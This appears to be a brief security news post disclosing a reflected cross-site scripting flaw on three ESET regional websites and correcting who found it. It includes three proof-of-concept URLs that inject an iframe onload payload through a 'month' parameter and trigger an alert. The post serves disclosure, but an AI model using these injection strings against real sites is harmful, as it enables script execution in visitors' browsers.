ESET websites vulnerable to Cross site scripting

Yesterday, we report that a hacker from INTRA team discovered the cross site scripting vulnerability in ESET websites. We are sorry for publishing this false information. The vulnerability found by a security researcher Fabián Cuchietti.

eset-brazil.com,www.eset-la.com,threatsense.com.br are vulnerable to Non-persistence XSS attack.

Poc:
http://www.eset-la.com/soporte/actualizaciones-threatsense?month='%22%3E%3Ciframe%20onload=alert(/XSS/)%3E

http://www.eset-brazil.com/soporte/actualizaciones-threatsense?p=56&searchword=&year=&month='%22%3E%3Ciframe%20onload=alert(/XSS/)%3E

http://www.threatsense.com.br/soporte/actualizaciones-threatsense?p=49&searchword=&year=&month='%22%3E%3Ciframe%20onload=alert(/XSS/)%3E